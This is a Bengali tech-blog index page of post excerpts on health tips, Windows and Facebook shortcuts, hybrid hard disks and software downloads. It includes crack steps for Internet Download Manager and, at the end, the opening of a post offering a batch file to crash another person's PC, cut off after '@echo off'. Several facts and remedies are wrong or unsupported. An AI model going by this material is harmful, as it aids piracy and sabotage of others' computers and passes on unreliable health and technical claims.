বিশেষ আর্টিক্যাল

গভীর ঘুম আমাদের আয়ু বাড়ায়!!!

আমরা সবারই রাতে ঘুমটা গভীর হওয়া জরুরি৷ গভীরভাবে ঘুমালে আপনি থাকবেন সুস্থ৷ লাভ করবেন দীর্ঘায়ু৷ তা বলছে বৈজ্ঞানিকরা৷ বৈজ্ঞানিকদের মতে যে সব বৃদ্ধ ব্যক্তিরা ১০০ বছর পার করেছেন তাদের ঘুমের মাত্রা ভাল ছিল৷ তারা অন্তত পক্ষে জীবনে দিনে ১০ ঘন্টা সময় ঘুমিয়ে কাটিয়েছেন৷

ফেসবুকের শর্টকাটগুলো আপনারা জানেন তো?

আমরা সবাই কমবেশি ফেসবুক ব্যবহার করি। কারো কাছে এটি নেশা আবার কারো কাছে এটি একটি বিরক্তিকর বিষয়। তবে আমার মতে এটি যদি এতই খারাপ সাইট হতো তাহলে এটি ওয়াল্ড র‍্যাংকিং এ কেন দু’নম্বর পজিশনে থাকবে? আর প্রযুক্তি এমন একটি জিনিস, যার ব্যবহারের উপর এর সুফল বা কুফল নির্ভর করে। যাই হোক। যারা আমার মতো ফেসবুক এডিক্ট আবার যারা মোটামুটি ফেসবুকে নতুন ঠিক তাদের জন্যই আমার আজকের এই পোস্ট। আমরা সবাই কম্পিউটারের বিভিন্ন শর্টকাট কমান্ড

পিসি স্বচ্ছন্দে রান করতে ড্রাইভারের ভূমিকা!

আমরা প্রায় সবাই জানি, কম্পিউটারের প্রধান চালিকাশক্তি হলো অপারেটিং সিস্টেম। তাই পিসির বিভিন্ন ধরনের সমস্যার জন্য সাধারণ ব্যবহারকারীরা প্রথমেই দায়ী করে থাকেন অপারেটিং সিস্টেমকে কিংবা হার্ডওয়্যারকে। কিন্তু বিস্ময়কর হলো, পিসির উদ্ভূত সমস্যার জন্য অপারেটিং সিস্টেম বা হার্ডওয়্যার ছাড়া ব্যবহারকারীর আচরণ যেমন দায়ী হতে পারে, তেমনি দায়ী হতে পারে পিসিতে ইনস্টল করা বিভিন্ন ধরনের ডিভাইস ড্রাইভার, যা আমরা অনেকেই বিবেচনায় আনি না। ডিভাইস ড্রাইভার মূলত ছোট এক ব্যাকগ্রাউন্ড প্রোগ্রাম, যা উইন্ডোজ ও কম্পিউটারের বিভিন্ন অংশের মাঝে সেতুবন্ধ হিসেবে কাজ করে।
ডিভাইস ড্রাইভার ছাড়া উইন্ডোজ কোনো কোনো পেরিফেরাল বা কম্পোনেন্ট, যেমন প্রিন্টার, মনিটর, সাউন্ডকার্ড, ডিভিডি ইত্যাদি নিয়ন্ত্রণ

নকিয়ার কল্যাণে আসছে ৪১ মেগাপিক্সেল ক্যামেরার ফোন!!!

ব্রাজিলে চলমান মোবাইল ওয়ার্ল্ড কংগ্রেসে নকিয়া ঘোষণা করলো নতুন এক সিমবিয়ান স্মার্টফোন ৮০৮ পিউরভিউ।
এই হ্যান্ডসেটের চমকে দেয়া বিষয়টি হলো এর ৪১ মেগাপিক্সেলের ক্যামেরা। খবর ম্যাশএবল-এর।
অবিশ্বাস্য হলেও সত্যিই নকিয়া কার্ল জেইস লেন্স এবং নকিয়ার তৈরি পিক্সেল ওভার-স্যামপলিং প্রযুক্তি কাজে লাগিয়ে এই শক্তিশালী ক্যামেরা দিয়েছে ৮০৮ পিওরভিউতে।

চিনে নিন বিশ্বের সবচেয়ে সুন্দরী হ্যাকারকে।

ক্রিস্টিনা ভ্লাদিমিরভনা ভেচিন্সকায়া (Russian: Кристина Владимировна Свечинская,জন্ম : February 16, 1989) একজন রাশিয়ান অর্থ পাচারকারী হ্যাকার।নিউ ইয়র্ক ইউনিভার্সিটির ছাত্রী থাকাকালীন সময়ে তিনি বেশ কিছু ব্রিটিশ ও আমেরিকান ব্যাংক থেকে অর্থ পাচার এবং নকল পাসপোর্ট ব্যবহারের দায়ে অভিযুক্ত হন।অভিযোগ অনুযায়ী তিনি ব্যাংক অ্যাকাউন্ট আক্রমনের কাজে Zeus Trojan Horse ব্যবহার করেছিলেন এবং আমেরিকা ও ওয়াছভিয়াতে অন্তত ৫ টি অ্যাকাউন্ট খোলেন,যেখানে পাচারকৃত ৩৫০০০$ পৌছেছিল।ধারনা করা হয় যে,তিনি আরো ৯ জনের সাথে ৩ মিলিয়ন ডলার সরিয়েছিলেন।তিনি তার আবেদনময়ী অথচ সাধারন উপস্থিতি তাকে বিশ্বের সবচেয়ে আবেদনময়ী হ্যাকার হিসেবে পরিচিতি এনে দিয়েছে।
ইংরেজিতে পারদর্শী ক্রিস্টিনা স্তাভ্রপল স্টেট ইউনিভার্সিটিতে পড়াশুনা করছিলেন।তার মা জানান,তার বাবার মৃত্যুর পর তাদের পরিবার ১২০০০ রুবলের বেতন দ্বারা চলছিল।তিন বছর পর ক্রিস্টিনা একটি ফাস্টফুডের দোকানে কাজ নেন।কিন্তু এই উপার্জন যথেষ্ট না হওয়াই তিনি একজন হ্যাকারের অর্থ পাচারকারী হিসেবে নিযুক্ত হন।এসময় তাকে ৮-১০% শেয়ার দেওয়া হত।তিনি ২০১০ সালে গ্রেপ্তার হন।

প্রযুক্তির (Technology) জীবন চক্র এবং ক্ষেত্রসমূহ।

প্রযুক্তি (Technology) বলতে কোন একটি প্রজাতির বিভিন্ন যন্ত্র এবং প্রাকৃতিক উপদান প্রয়োগের ব্যবহারিক জ্ঞানকে বোঝায়। নিজের প্রাকৃতিক পরিবেশের সাথে প্রজাতিটি কেমন খাপ খাওয়াতে পারছে এবং তাকে কিভাবে ব্যবহার করছে তাও নির্ধারণ করে প্রযুক্তি। মানব সমাজে প্রযুক্তি হল বিজ্ঞান এবং প্রকৌশলের একটি আবশ্যিক ফলাফল। অবশ্য অনেক প্রাযুক্তিক উদ্ভাবন থেকেই আবার বিজ্ঞান ও প্রকৌশলের অনেক জ্ঞানের ভবিষ্যদ্বাণী করা হয়েছে। মানব সমাজের প্রেক্ষিতে প্রযুক্তির সংজ্ঞায় বলা যায়, “প্রযুক্তি হল কিছু প্রায়োগিক কৌশল যা মানুষ তার প্রতিবেশের

জেনে নিন উইন্ডোজ এর সবগুলো শর্টকাট KEY

আজ আপনাদের সাথে শেয়ার করতে যাচ্ছি কিছু উইন্ডোজ এর KEY। প্রতিদিন আমরা  কতো শত শর্টকাট কী যে ব্যাবহার করি তা মনে হয় আমরা নিজেও জানি না । আমি চেষ্টা করেছি  ইন্টারনেট থেকে কিছু শর্টকাট কী সংগ্রহ করে সবার সাথে শেয়ার করতে । আশা রাখি আপনাদের কাজে আসবে।

আপনার মোবাইলের ক্যামেরা দিয়েই ভালো মানের ছবি কিভাবে তুলবেন।

2moqd80   ̴ı̴̴̡̡̡ ̡͌l̡̡̡ ̡͌l̡*̡̡ ̴̡ı̴̴̡ ̡̡͡|̲̲̲͡͡͡ ̲▫̲͡ ̲̲̲͡͡π̲̲͡͡ ̲̲͡▫̲̲͡͡ ̲|̡̡̡ ̡ ̴̡ı̴̡̡ ̡͌l̡̡̡̡.  যেভাবে আপনার মোবাইলের ক্যামেরা দিয়েই তুলবেন ভালো মানের ছবি  ̴ı̴̴̡̡̡ ̡͌l̡̡̡ ̡͌l̡*̡̡ ̴̡ı̴̴̡ ̡̡͡|̲̲̲͡͡͡ ̲▫̲͡ ̲̲̲͡͡π̲̲͡͡ ̲̲͡▫̲̲͡͡ ̲|̡̡̡ ̡ ̴̡ı̴̡̡ ̡͌l̡̡̡̡.  By DJ ΛЯIF | Techtunesআশা করি সবাই ভালো আছে। আজ আপনাদের জন্য নিয়ে আসলাম আপনি কিভাবে আপনার মোবাইল ক্যামেরা দিয়ে ভালো মানের ছবি তুলবেন সে বিষয় গুলো নিয়ে। বর্তমান সময়ে প্রায় সকলের হাতে হাতেই আছে ক্যামেরা মোবাইল। হোক তা চাইনিজ বা হোক কোয়ালিটির, ক্যামেরা মোবাইল বলে কথা। অনেকেরই ধারণা যে মোবাইলের ক্যামেরা দিয়ে ভালো ছবি তোলা সম্ভব না, কিন্তু আসলে ধারণাটি ভুল। ছবি তুলতে হলে যে শুধু ৮-১০ মেগাপিক্সেল ক্যমেরা লাগবে এই ধারণাটিও ভুল। মোটামুটি ৩ মেগাপিক্সেল ক্যামেরাই যথেষ্ট আমাদের প্রাত্যহিক ব্যবহারের জন্য, কারণ আমরাতো আর সাংবাদিক না! তবে যারা সাংবাদিক তাদের কথা আলাদা।

গুগল ক্রোম রক্ষা করতে পরামর্শগুলি অনুসরণ করুন ।

আমরা সবাই কম বেশি গুগল ক্রোম ব্যবহার করি।তাই গুগল ক্রোম রক্ষা করতে পরামর্শগুলি অনুসরণ করুন-
Chrome Web Store – Simple Startup Password// // //
এই লিঙ্ক  অনুসরণ করুন store
এখান থেকে যেকোনো ফ্লাগিন আপনার গুগল ক্রোম  ইনস্টল  করুন
এবার আপনি নিরাপদে ইন্টারনেট ব্যবহার করুন
আজ আর বেশি লিখলাম না . পরে কথা হবে >>

Screenshot of Chrome Privacy Proector

হাইব্রিড হার্ডডিস্ক :: প্রযুক্তির নতুন এক চমক

আজ আপনাদের একটি দারুন প্রযুক্তি খবর দিব। হাইব্রিড ফল, সবজি, গাড়ী, এমনকি হাইব্রিড Tanvir এর নাম ও আপনারা শুনে থাকবেন। কিন্তু এই হাইব্রিড হার্ড-ডিস্ক এর নাম শুনেছেন বলে আমার মনে হয় না। যদি সত্যি না শুনে থাকেন, তাহলে জলদি এদিকে আসেন। কারন আপনাকে আমি আজকে সেই হাইব্রিড হার্ড ডিস্ক এর গল্প বলতে যাচ্ছি।





বাজারে SSD (Solid State Drive) সহজলভ্য হতে না হতেই এই HHD এর আগমন। আমি এখানে এসএসডি সম্পর্কে হালকা একটা ধারনা দেই। ১৯৭০ সালের দিকে এই এসএসডি এর আবির্ভাব। কিন্তু কম ধারনক্ষমতার বিপরীতে উচ্চমূল্য একে আমাদের নাগালের বাহিরেই রেখে দেয়। ২০০৫ সালের দিকে এসএসডি গিগাবাইট এর ঘরে প্রবেশ করে। কিন্তু কিছুতেই এর দাম কমানো যাচ্ছে না। কারন এতে ফ্ল্যাশ মেমরি ব্যাবহার করা হয় যার মূল্য বেশি। তবে এটা ঠিক যে এসএসডি আসলেই একটা জিনিস। সোজা কথায় বস। কিন্তু হাইব্রিড হার্ডডিস্ক এর আগমনের ফলে সেটা মনে হয় অতীত হবার পথে।



আপনি প্রশ্ন করতে পারেন যে এর নাম আসলে হাইব্রিড দেয়া কেন হল, আর এর বৈশিষ্ট কি????? আমি বলছি আপনাকে, আসলে আগেকার মেকানিক্যাল হার্ডডিস্ক ও আধুনিক এসএসডি এর সমন্বয়ে এই নতুন ধারার হাইব্রিড হার্ডডিস্ক তৈরি করা হয়েছে। আমি আগেই বলেছি এসএসডি এর উচ্চগতির দামের কারনে আজকে এত দিনেও এটি আমাদের কাছে সহজলভ্য নয়। এই দামের মাঝে সমন্বয় করার জন্যই নতুন এই হার্ডডিস্ক এর আগমন। সুবিধা সব এসএসডি এর মত, কিন্তু দাম হাতের মাঝেই। দারুন ব্যাপার না? তবে অনেকে আবার প্রস্ন করতে পারেন যে পুরানো মেকানিক্যাল হার্ডডিস্ক যে এখানে ব্যাবহার করা হয়েছে এতে পুরানো সমস্যাগুলো তো থেকেই যাবে। হা হা হা……………………।। এত চিন্তা করেন কেন? এখানে পুরানো মেকানিক্যাল ড্রাইভে কে অপশোনাল হিসাবে ব্যাবহার করা হয়েছে।









হাইব্রিড হার্ডডিস্ক এ এসএসডি কে প্রাইমারি, ও আগের মেকানিক্যাল কে সেকেন্ডারি হিসাবে ব্যাবহার করা হয়েছে। আসুন দেখি পুরানো মেকানিক্যাল ড্রাইভ থেকে এটি কি কি সুবিধা বেশি দেয়।
৫৪০০ আরপিএম এর একটি হার্ডডিস্ক ডাটা রিড করে ৮০মেগা/সেকেন্ড, আর একটি হাইব্রিড হার্ডডিস্ক ৭০০মেগা/সেকেন্ড ডাটা রিড আর ৮০০মেগা/সেকেন্ড ডাটা রাইট করে।

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
অবিশ্বাস্য গতি, তাই না…………………।






এর ফলে লাভ টা কি দেখি, এই দ্রুতগতিতে ডাটা রিড করার কারনে যে কোন আপ্লিকেশন দ্রুতগতিতে লোড হবে। আপনার মেশিন যতই উচ্চখমতাসম্পন্ন হোক না কেন, হার্ডডিস্ক যদি দ্রুত ডাটা আদান প্রদান করতে না পারে, তাহলে আপনার কম্পিউটার এর আপ্লিকেশন দ্রুতগতিতে চলবে না। ফলাফল হচ্ছে সুপার স্পিড ইনপুট কমান্ড >>> সুপার স্লো আউটপুট। ( যদি এর গতি নিচের ছবির মত হয় )




অথচ হাইব্রিড এর রিড ৭০০মেগা, রাইট ৮০০ মেগা সেকেন্ডে। দেখুন তাহলে।

একটি গবেষণায় দেখা গেছে যে মেকানিক্যাল এর বুট টাইম ৪০ সেকেন্ড যেখানে হাইব্রিড এর ২০ সেকেন্ড মাত্র। আর মাল্টিটাস্ক এর ক্ষেত্রে মেকানিক্যাল ৫০ সেকেন্ড সময় নেয় যেখানে হাইব্রিড নিচ্ছে মাত্র ১০ সেকেন্ড। আর গেমিং এর সময় হাইব্রিড ৪০ সেকেন্ড সময় নেয় যেখানে মেকানিক্যাল ৭০ সেকেন্ড নেয়। বুঝুন তাহলে।








এবার আসুন হাইব্রিড হার্ডডিস্ক এর ডাটা জমা রাখার সিস্টেম সম্পর্কে একটু জানি। এই অংশটি একটু জটিল। প্রথমেই বলেছি যে এর দুইটি অংশ। যখন কোন ডাটা মেমরিতে সেভ হবার নির্দেশ আসে তখন এটি এসএসডি অংশে সেভ হতে থাকে। যখন এসএসডি সম্পূর্ণ ভরাট হয়ে যায়, তখন সেটা মেকানিক্যাল এ সেভ হয় ও এসএসডি এর জায়গা খালি করে। এর ফলে শুধু দরকারি মুহূর্তেই এর মেকানিক্যাল ডিস্ক ব্যাবহার হয় যা এর আয়ু বৃদ্ধি করে ও বিদ্যুৎ কম খরচ করে। এটি মাত্র ২ ভোল্ট এ চলে। অর্থাৎ এটি ভয়াবহ রকম বিদ্যুৎ সাশ্রয় করে।




দাম সম্পর্কে না হয় নাই বললাম। কিন্তু এর মান যে অসাধারন টা নিশ্চয়ই আপনারা বুঝতে পারছেন। তবে আরও কিছু গুরুত্বপূর্ণ কথা বলি। হাইব্রিড হার্ডডিস্ক কেনার ক্ষেত্রে এর মেমরি টাইপ এর দিকে খেয়াল রাখবেন। দুই ধরনের ফ্ল্যাশ মেমরি ব্যাবহার করা হয় এখানে।

১. SLC
২. MLC


SLC সবচেয়ে ভালো। এটি MLC থেকে দ্রুতগতির ও বিদ্যুৎসাশ্রয়ী। আপনি যখন হাইব্রিড হার্ডডিস্ক কিনবেন তখন হার্ডডিস্ক এর গায়ে SKNHCG8U5MJ4 এই ধরনের একটি সিরিয়াল থাকবে। আপনি গুগল এ খুজে সহজেই এই সিরিয়াল থেকে এর মেমরি টাইপ বের করতে পারবেন।





নতুন প্রজন্মের এই হার্ডডিস্ক দিয়ে যে আমরা অতি শীঘ্রই প্রযুক্তির এই গতির খেলায় টার্বো যোগ করতে যাচ্ছি একথা নিঃসন্দেহে বলা যায়।

উইন্ডোজ ৮ এর কোন কোন এডিশন সামনে আসতেছে!!! জানেন? না জানলে জেনে নিন।

আজ আপনাদেরকে একটি নতুন সংবাদ দিতে যাচ্ছি। কেমন আছেন সবাই? আশা করি সবাই মহান আল্লাহ তায়ালার অশেষ রহমতে খুবই ভাল আছেন। ভাল থাকুন ও ভাল রাখুন আপনার পাশের মানুষটিকে।
কয়েকদিন আগে রিলিহ হলো মাইক্রোসফট কর্পোরেশানের মাইক্রোসফট উইন্ডোজ অপারেটিং সিস্টেমের নতুন ভার্সন মাইক্রোসফট উইন্ডোজ ৮ কনজুমার প্রিভিউ ভার্সন ( বেটা ভার্সন)। অনেকেই এই নতুন অপারেটিং সিস্টেম সম্পর্কে মোটামুটি ভাবে জানেন। এই অপারেটিং সিস্টেমের উপর ভিত্তি করে আমার লেখা কয়েকটি টিউটোরিয়াল আছে টিউনারপেজে। আপনারা সার্চ অপশানে সার্চ দিলেই পাবেন। এর মধ্যে রয়েছে কিভাবে উইন্ডোজ ইন্সটল করবেন, পেনড্রাইভ থেকে কীভাবে ইন্সটল করবেন, আনইন্সটল করা, ডুয়েল বুটে উইন্ডোজ ৭ ও ৮ চালানো, ভার্চূয়াল ইন্সটলসহ আরও কয়েকটি।
এই নতুন অপারেটিং সিস্টেম বাজারে রিলিজ দেয়ার আগে মাইক্রোসফট প্রথমেই একটি ডেভেলপার প্রিভিউ ভার্সন বাজারে দেয়। যাতে এর ভিতরে থাকা সমস্যাগুলো ধরা যায়। তারপর সমস্যাগুলো ঠিক করে এর নতুন একটি বেটা ভার্সন “মাইক্রোসফট উইন্ডোজ ৮ কনজুমার প্রিভিউ ভার্সন” রিলিজ করে মাইক্রোসফট। এটি তো হল মাইক্রোসফট অপারেটিং সিস্টম উইন্ডোজ ৮ এর বেটা ভার্সন। এটা মূলতঃ উইন্ডোজ ৮ এর একটা প্রিভিউ ভার্সন। উইন্ডোজ ৮ এর মূল ভার্সন এখনও বাজারে রিলিজ করা হয় নি মাইক্রোসফট থেকে।
মাইক্রোসফট এখন তাদের উইন্ডোজ অপারেটিং সিস্টেম উইন্ডোজ ৮ এর মূল ভার্সন রিলিজ করার জন্য কাজ করছে। তারা এজন্য অন্যন্যা উইন্ডোজ অপারেটিং সিস্টেমের মতো উইন্ডোজ ৮ এরও কয়েকটি ভার্সন রিলিজ করবে নির্দিষ্ট সময় অন্তর অন্তর। তবে শুনা যাচ্ছে এই বছরের শেষের দিকে আপনারা উইন্ডোজ ৮ এর ফুল ভার্সন হাতে পাবেন।
মাইক্রোসফট তাদের উইন্ডোজ ৮ এ যেসব ভার্সনগুলো সামনে রিলিজ করবে, তার তালিকা তারা প্রকাশ করেছে তাদের বর্তমান বেটা ভার্সন Windows 8 Consumer Preview version এ। আপনি এটা দেখতে পাবেন Windows Registry Editor এ। এজন্য প্রথমে Windows Registry Editor এ। এজন্য প্রথমে Windows Registry Editor এ প্রবেশ করুন।
—-> প্রথমে Window Key + R চাপুন।
—-> এবার লিখুন regedit ও এন্টার চাপুন।
—-> তাহলেই Windows Registry Editor চালু হবে।
—-> এবার এখানে যান HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Component Based Servicing\PackageIndex\Product
—-> তাহলে নিচের মতো আসবে।

নতুন যে ভার্সনগুলো আসতেছে

  • Microsoft Windows Enterprise Edition
  • Microsoft Windows Enterprise Eval Edition
  • Microsoft Windows Home Basic Edition
  • Microsoft Windows Home Premium Edition
  • Microsoft Windows Prerelease ARM Edition
  • Microsoft Windows Prerelease Edition
  • Microsoft Windows Professional Plus Edition
  • Microsoft Windows Starter Edition
  • Microsoft Windows Ultimate Edition
আশা করি প্রত্যেকটি ভার্সনটি চমৎকার ও সুন্দর হবে।

আপনার বাড়তি ওজন কমানোর কিছু টিপস।

আজ আপনাদের জন্য আমার আগের পোষ্ঠ ওজন বাড়ানো বিপরীতে নিয়ে আসলাম বাড়তি ওজন কমানো কিছু টিপস। বাড়তি ওজন আপনার স্বাস্থ্যের জন্য ঝুঁকিপূর্ণ। ওজন কমান প্রাকৃতিক নিয়মে। এ নিয়ম স্বাস্থ্যসম্মত ও ঝুঁকিবিহীন। কয়েকটি কার্যকর ঘরোয়া পদ্ধতি অবলম্বন করে ওজন কমান আর ঝুঁকিমুক্ত থাকুন বিভিন্ন মারাত্মক রোগ থেকে।
তাজা ফলমূল ও সবুজ শাকসবজি হলো কম ক্যালরিযুক্ত খাদ্য, তাই যাঁদের ওজন বেশি তাঁদের বেশি করে এগুলো খাওয়া উচিত।
* অতিরিক্ত লবণ খাওয়া পরিহার করতে হবে। কারণ, লবণ শরীরের ওজন বাড়াতে সাহায্য করে।

নিয়ে নিন ২০১২ সালের নতুন গেইম

গেম খেলতে পছন্দ করেন না এমন লোক খুজে পাওয়া দুষ্কর। সব পিসি ব্যবহারকারীই কমবেশি বিভিন্ন গেম খেলেন। কিন্তু এমন অনেকেই রয়েছেন যারা বলতে গেলে গেম এর জন্য ক্রেজি, বাংলায় বলতে গেলে গেমের পোকা। নিত্যনতুন-নতুন পুরাতন যে কোন গেম তাদের খেলা চাই চাই। কিন্তু সব গেম খেলোয়ারই জানেন গেম খেলার সময় টুকটাক চিটিং না করলে গেমে সামনে আগানো প্রায় অসম্ভব। তাই সবাই চিটকোড ব্যবহার করেন এই সব গেম খেলার জন্য।

আসুন জেনে নিয় কিছু প্রয়োজনীয় রান কমান্ড।

আশা করি সবাই ভালো আছেন। আজ আপনাদের জন্য নিয়ে আসলাম কম্পিউটার ব্যবহার করার সময় প্রয়োজনীয় কিছু RUN কমান্ড।
আসুন পরিচয় করিয়ে দিয় আপনার এবং আপনার পিসির অনেক অজানা রান কমান্ড যা আপনাকে কাজ করায় সাহায্য করবে ।

Convert করুন প্রয়োজনীয় সব Audio বা Video File খুব সহজে।

আজ আপনাদের জন্য নিয়ে আসলাম Super Fast একটি Converter। এই Converter-টির নাম হল Oxelon Media Converter। আপনারা অনেকেই হয়ত Converter-টির সাথে পরিচিত কিংবা এটি ব্যবহার করেছেন। এই Converter দিয়ে খুবই অল্প সময়ে আপনার প্রয়জনীয় Format এ Convert করতে পারবেন বিভিন্ন ধরনের Media File। আমি নিজেও Converter-টি ব্যবহারকরি। আপনারও ব্যবহার করে দেখুন ভাল লাগবে আশা করি। নিচে বিস্তারিত দেয়ার চেষ্টা করলাম।

নিয়ে নিন Firefox 12.0 Beta ।

আশা করি সবাই ভালো আছেন। আজ আপনাদের জন্য নিয়ে আসলাম নতুন  Firefox 12.0 Beta।
Firefox এর সাথে আমরা সবাই কমবেশি পরিচিত । তাই আর কিছু লিখলাম না। এখন এর latest Version-টি হল 
Firefox 12.0 Beta
এই Link থেকে Download করে নিন latest version-টি।

এছাড়াও কিছু প্রয়োজনীয় Software এর latest version Download করে নিন নিচের Link থেকে একদম free-তে
এই Website এ Software গুলো ক্যাটাগরি অনুযায়ী ভাগ করা থাকে।
দরকারি Software-টি এখনই Download করে নিতে পারেন site-টি থেকে। আজ এই পর্যন্ত।
ভালো থাকবেন।

ঠিক করুন কে কে আপনার ফেসবুকের Friend List দেখতে পারবে?

বাই ডিফল্ট আপনার ফেসবুকের বন্ধুর তালিকা সবাই দেখতে পায়, তবে আপনি ইচ্ছা করলেই এটা customize করতে পারেন । কিভাবে কাস্টমাইজ করতে পারবেন তা বলার আগে যে যে অপশন বেছে নিতে পারবেন তা তুলে ধরছি –
• পাবলিক (পুথবীর সবাই আপনার বন্ধুর তালিকা দেখতে পাবে)
• বন্ধু (এবার শুধু আপনার বন্ধুরা আপনার Friend List দেখতে পাবে)
• বন্ধু তবে গ্রুপ সীমাবদ্ধতা (আপনি নির্ধারণ করে দিতে পারবেন আপনার কোন গ্রুপের বন্ধুরা বন্ধু তালিকা দেখতে পাবে ।
• একমাত্র আপনি (এবার আপনার বন্ধু তালিকা সর্ব সংরক্ষিত, শুধু আপনি দেখতে পাবেন)
• কাস্টম (এটা থেকে আপনি বন্ধু স্পেসিফিক করতে পারবেন)
কিভাবে Friend List Visibility Restriction ঠিক করবেন –
[ছবিটি ক্লিক করে বড় করে দেখুন]

[ছবিটি ক্লিক করে বড় করে দেখুন]

[ছবিটি ক্লিক করে বড় করে দেখুন]

নিয়ে নিন ইন্টারনেট ডাউনলোড ম্যানেজার এর ফাইনাল ভার্সন ৬.১০ আজীবনের জন্য |

আপনারা যারা ইন্টারনেট ব্যাবহার করেন তারা সবাই জানেন যে ইন্টারনেট ডাউনলোড ম্যানেজার এর প্রয়োজনীয়তা কতখানি |সম্প্রতি এর নতুন ভার্সন ৬.১০ বের হয়েছে |আজ আমি আপনাদের এর ফুল ভার্সন গিফট করছি |আপনারা নিচের পদ্ধতি অবলম্বন করুন |
পদ্ধতিসমূহ
1. Install IDM
2. After installation, CLOSE IDM from the notification area
3. Run “Patch.exe” (Run as administrator for vista / 7)
4. Click patch and locate the Location where you have installed the IDM.

ওজন বাড়ানোর উপায় (হার্ডগেইনারদের জন্য)

অনেকেই আছেন যারা অনেক খাওয়া এবং ব্যায়াম করার পরও সেই রোগাই থেকে যান; ওজন একটুও বাড়ে না (হার্ডগেইনার)- এই পদ্ধতিটি বিশেষ ভাবে তাদের জন্য।

জিমে ব্যায়াম করে ওজন বাড়াতে গেলে শুধু পেশী বাড়বে, ফ্যাট বাড়বে না- এমন হবে না। পেশীর সাথে ফ্যাটও বাড়বে। মোটামুটি হিসাবে ৬০% পেশী এবং ৪০% ফ্যাট বাড়ে। পরে এই ফ্যাট ভিন্ন লাইট ওয়েট ব্যায়াম এবং দৌড়িয়ে ঝরিয়ে ফেলতে হয়। বডিবিল্ডাররা এভাবেই দিন দিন ওজন বাড়ান।

বর্তমান বিশ্ব সাধারণ জ্ঞান।

আজ আপনারা সবাই ভালো আছেন।সবাই শুভেচ্ছা জানিয়ে শুরু করছি বর্তমান বিশ্ব সাধারণ জ্ঞান এর আরেকটি পর্ব ……..এই পেইজের কিছু পাঠকদের যদি এই টিউনটি একটু উপকারে আসে তাহলে মনে করব আমার লেখা সার্থক হয়েছে………আশা করি সবাই সাথে থাকবেন……..
***BCS ও অন্যান্য পরীক্ষার জন্য সাধারণ জ্ঞান (বিজ্ঞান ও প্রযুক্তি)
  • কাঁচা কলা পাকানো হয় – ইথিলিন (C2H4)দিয়ে ।
  • প্লাসটিক(PVC)তৈরী হয়- অ্যাসিলিটিন (C2H2)দিয়ে ।
  • কাচঁ তৈরির প্রধান কাঁচামাল- বালি ।
  • পাতার সবুজ বর্ণ বিবর্ণ হয় – ক্যালসিয়ামের অভাবে ।

জ্যোতিষ বিষয়ক বাংলা ভাষায় চমৎকার একটি সফটওয়্যার।

আজ আপনাদের সঙ্গে এমন একটা সফটওয়্যার শেয়ার করব য়া ভারতের প্রায় 80 কোটির বেশি মানুষ বিশ্বাস করে। আপনি চাইলে বিশ্বাস করতে পারেন আর না চাইলেও ক্ষতি নেই। সফটওয়্যার টি ব্যাবহার করে দেখুন আসা করি ভালো লাগবে। হ্যাঁ ঠিকই ধরেছেন এটি জ্যোতিষ বিষয়ক সম্পূর্ন বাংলা ভাষায়। বাংলা ছাড়াও ভারতের সবকটি ভাষা সমর্থন করে। সফটওয়্যারটিতে জানতে পাবেন আপনার ভবিষ্যত,গ্রহ,নক্ষত্র,প্রভৃতির বিচার বিস্লেষন। বিস্তারিত জানতে ও ডাউনলোড করতে এখানে সফটওয়্যার টি ব্যাবহার করে য়দি ভালো লাগে জানাতে ভুলবেন না ।

চাকরি খুঁজেন? সফটওয়্যারে নিজের সিভি তৈরি করে নিন।

আশা করি সবাই ভালো আছেন। আজ আপনাদের জন্য নিয়ে আসলাম সহজ একটি অধ্যায়। ভাল ক্যারিয়ার এর জন্য সুন্দর একটি রিজিউম প্রয়োজন কারণ সুন্দর একটি রিজিউম চাকরী পাওয়ার ক্ষেত্রে প্রতিদ্ধন্দী থেকে এক কদম এগিয়ে রাখে। কারণ চাকরীদ্বাতা সাধারণত যে কোন রিজিউম দেখতে গড়ে ৫/৭ সেকেন্ড এর বেশী সময় দেয়না। তাই এই কয়েক সেকেন্ডের মধ্যেই আপনাকে তুলে ধরতে হবে আপনার যোগ্যতা, অভিজ্ঞতা বা আরো বেশী কিছু যদি থেকে থাকে আর তা হতে হবে দৃষ্টিনন্দন এবং নির্ভূল যা অনেক ক্ষেত্রে রিজিউম তৈরী করার পর সেটা সঠিক এবং নির্ভূল হলো কিনা তা নিয়ে শংকায় ভূগী। এ সমস্যা থেকে সমাধান দিতে Resume Maker Pro v.11 সফটওয়ারটি হতে পারে একটি সহজ সমাধান। এতে বেশকিছু প্রয়োজনীয় অপশন বিল্ট-ইন আছে।

অ্যাসিডিটি কমানোর উপায়


—এক গ্লাস উষ্ণ গরম পানির মধ্যে সামান্য গোলমরিচ গুঁড়ো আর অর্ধেক লেবুর রস মিশিয়ে নিয়মিত খান। এতে অ্যাসিডিটি দূর হয়ে যাবে।
—প্রতিদিন সালাদের মধ্যে মুলা খান। মুলার ওপর বিট নুন বা গোলমরিচ গুঁড়ো ছড়িয়ে খান।
—জায়ফলের সঙ্গে সৌঠচূর্ণ মিশিয়ে খান। এতে অ্যাসিডিটি দূর হয়ে যাবে।
—আদা অথবা পটল গরম পানির মধ্যে ফুটিয়ে সেই পানি পান করুন।
—যখনই দুধ পান করবেন সব সময় ঠাণ্ডা দুধ পান করুন।
—মৌরী, আমলকী এবং গোলাপফুল সমপরিমাণে মিশিয়ে চূর্ণ তৈরি করুন। সকাল-বিকাল অর্ধেক চামচ খান। এতে অ্যাসিডিটি কমে যাবে।
—পিপলের চূর্ণ মধুর সঙ্গে মিশিয়ে খান, অ্যাসিডিটি একেবারেই দূর হয়ে যাবে।
facebook হতে সংগৃহীত।

মোটামুটি সারা জীবনের জন্য PC সাটডাউন করে দিন

আশা করি সবাই ভালো আছেন। আজ আাপনাদের জন্য নিয়ে আসলাম কিভাবে আপনি আরেক জনের কম্পিউটারকে সামান্য কমান্ড নোট প্যাডে লিখে কম্পিউটারকে CRASH করতে পারেন সামান্য সময়ের জন্য যতক্ষণ না পর্যন্ত কম্পিউটার নতুন করে SETUP দেওয়া না হয়।
চলুন তাহলে ……………
NoTeP@D ওপেন করে নিচের কোড P@sTe
করে যে কোন নামে .bat extension এ S@vE করুন ।।।
@echo off
